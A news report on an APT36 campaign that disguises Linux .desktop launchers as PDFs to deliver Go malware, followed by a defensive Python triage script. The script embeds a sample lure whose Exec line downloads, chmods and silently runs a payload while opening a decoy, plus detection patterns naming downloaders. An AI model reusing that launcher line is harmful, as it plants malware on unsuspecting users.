APT36 Launches New Cyber-Espionage Campaign on Indian Govt
APT36, also known as Transparent Tribe, has launched a new espionage campaign targeting government and defense institutions in India. This Pakistan-linked group, active since at least 2013, has long relied on phishing campaigns and credential theft to infiltrate restricted systems. In its latest operation, the attackers introduced a novel infection technique: Linux “.desktop” launcher files disguised as documents, which retrieve malicious payloads from Google Drive and establish a covert command-and-control channel.
According to CloudSEK, the campaign begins with the distribution of ZIP archives containing counterfeit files that carry PDF icons but are, in reality, .desktop launcher files, which the Linux desktop environment executes when the user opens them. Once launched, the file downloads encrypted payloads from a remote service, decrypts them, and stores them in a temporary directory. The dropped component is then made executable and started in the background. To reduce suspicion and conceal this activity, a decoy PDF is simultaneously opened in Firefox, giving the illusion of a legitimate document while the hidden malware is quietly installed.
The downloaded payload is a statically compiled Go-based binary module that first inspects the environment for debugging tools or sandbox execution to avoid detection. If none are found, the malware establishes persistence within the system by enabling autostart on user login. It then initiates a WebSocket connection to a command-and-control server, maintaining a continuous channel for instructions and data exfiltration. This technique allows the attackers to stealthily monitor compromised systems and siphon sensitive information over extended periods.
To mask its presence, several deceptive techniques are employed, such as embedding icons that mimic standard documents and giving the launcher a PDF-style file name. The malware operates silently: no terminal window is opened and no system notification is displayed, making it particularly dangerous in Linux environments, where organizations often assume a higher baseline of security and rarely scrutinize launcher files.
Researchers highlight that the use of Google Drive for payload delivery demonstrates the group’s evolving tradecraft and complicates detection. Phishing emails are crafted with references to procurement and military supplies, designed to appeal to employees in government and defense sectors, significantly increasing the likelihood of successful infection. Once compromised, attackers gain long-term control of systems, enabling continuous surveillance and data interception.
Experts recommend blocking access to the identified command-and-control domains, reviewing activity logs for unusual outbound connections, and implementing advanced attachment scanning in email systems, including inspection of .desktop files inside archives. Strengthening endpoint defenses, deploying comprehensive network traffic monitoring, and conducting regular workstation audits are also advised. Given that the campaign targets critical infrastructure, the threat is assessed as severe, significantly heightening the risk of sensitive data leaks.
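As an added example for the workstation audits recommended above (this is not CloudSEK's tooling or any file from the campaign), the Python script below parses Linux .desktop launchers and flags the traits the infection chain describes: a Name ending in a document extension, a document icon paired with a non-viewer Exec, an inline shell script, Terminal=false, a downloader, staging in a temp directory, and a viewer opening a decoy beside the real payload. The indicator names, the two sample launchers (including the placeholder Google Drive file id) and the directories searched are constructed assumptions; the article does not say which autostart mechanism the implant uses, so the autostart directories are only where a login-persistence launcher would normally be found.

```python
"""Triage Linux .desktop launchers for the document-impersonation tradecraft
described above. Added example (not CloudSEK's analysis code or the APT36
sample); indicator names, the sample launchers and search paths are constructed."""
import re
import shlex
from pathlib import Path

# Extensions, icon names and tools that matter for the launcher-as-document trick.
DOC_EXT = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt")
DOC_ICONS = ("pdf", "office", "document", "text-x-generic", "word")
VIEWERS = {"evince", "okular", "atril", "xreader", "libreoffice", "firefox",
           "chromium", "xdg-open", "zathura"}
SHELLS = {"sh", "bash", "dash", "zsh"}
DOWNLOADERS = r"\b(curl|wget|python3?|perl|base64|openssl)\b"
STAGING = r"(chmod\s+\+?x|/tmp/|/dev/shm/|/var/tmp/)"


def parse_desktop(text: str) -> dict:
    """Key/value pairs of the [Desktop Entry] group; other groups are ignored."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
            continue
        if in_group and "=" in line:
            key, _, value = line.partition("=")
            entry[key.strip()] = value.strip()
    return entry


def triage(text: str) -> list:
    """Return (code, detail) indicators; an empty list means nothing stood out."""
    e = parse_desktop(text)
    name, icon, exec_ = e.get("Name", ""), e.get("Icon", ""), e.get("Exec", "")
    try:
        argv = shlex.split(exec_)
    except ValueError:            # unbalanced quotes: fall back to a plain split
        argv = exec_.split()
    prog = Path(argv[0]).name.lower() if argv else ""
    findings = []
    if name.lower().endswith(DOC_EXT):
        findings.append(("doc-name", f"Name {name!r} ends in a document extension"))
    if any(t in icon.lower() for t in DOC_ICONS) and prog not in VIEWERS:
        findings.append(("icon-spoof", f"Icon {icon!r} mimics a document but Exec runs {prog!r}"))
    shell_wrapper = prog in SHELLS and "-c" in argv
    if shell_wrapper:
        findings.append(("shell-wrapper", f"Exec hands an inline script to {prog}"))
        if e.get("Terminal", "false").lower() == "false":   # spec default is false
            findings.append(("no-terminal", "Terminal=false keeps that script off screen"))
    fetch = re.search(DOWNLOADERS, exec_)
    if fetch:
        findings.append(("downloader", f"Exec fetches or decodes content with {fetch.group(1)}"))
    if re.search(STAGING, exec_):
        findings.append(("tmp-stage", "Exec stages or chmods something in a temp directory"))
    viewer = next((v for v in VIEWERS if re.search(rf"\b{re.escape(v)}\b", exec_)), None)
    if viewer and prog not in VIEWERS and (fetch or shell_wrapper):
        findings.append(("decoy", f"{viewer} opens a document beside the real payload"))
    return findings


def scan_paths(dirs) -> dict:
    """Triage every *.desktop under the given directories; returns {path: findings}."""
    hits = {}
    for base in dirs:
        root = Path(base).expanduser()
        if not root.is_dir():
            continue
        for p in root.rglob("*.desktop"):
            try:
                found = triage(p.read_text(errors="replace"))
            except OSError:
                continue
            if found:
                hits[str(p)] = found
    return hits


# Constructed sample launchers (not the real campaign artefacts). The lure mirrors
# the chain described in the article, with a placeholder Google Drive file id.
LURE = """[Desktop Entry]
Type=Application
Name=Procurement_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -sL 'https://drive.google.com/uc?export=download&id=PLACEHOLDER' -o /tmp/.cache-x; chmod +x /tmp/.cache-x; nohup /tmp/.cache-x >/dev/null 2>&1 & firefox /tmp/decoy.pdf"
"""
BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=org.gnome.TextEditor
Terminal=false
Exec=gnome-text-editor %U
"""

if __name__ == "__main__":
    for label, sample in (("lure", LURE), ("benign", BENIGN)):
        print(label, [code for code, _ in triage(sample)])
    # Assumed locations: login persistence lives in the autostart dirs, the lure in user dirs.
    for path, found in scan_paths(["~/.config/autostart", "/etc/xdg/autostart",
                                   "~/Desktop", "~/Downloads"]).items():
        print(path)
        for code, detail in found:
            print(f"  [{code}] {detail}")
```

A genuine PDF viewer launcher (document icon, Exec pointing at a viewer) produces no findings, so the script can run over autostart and download directories with few false positives; anything that scores "shell-wrapper" plus "downloader" or "tmp-stage" deserves a look at the staged binary and the host's outbound WebSocket connections.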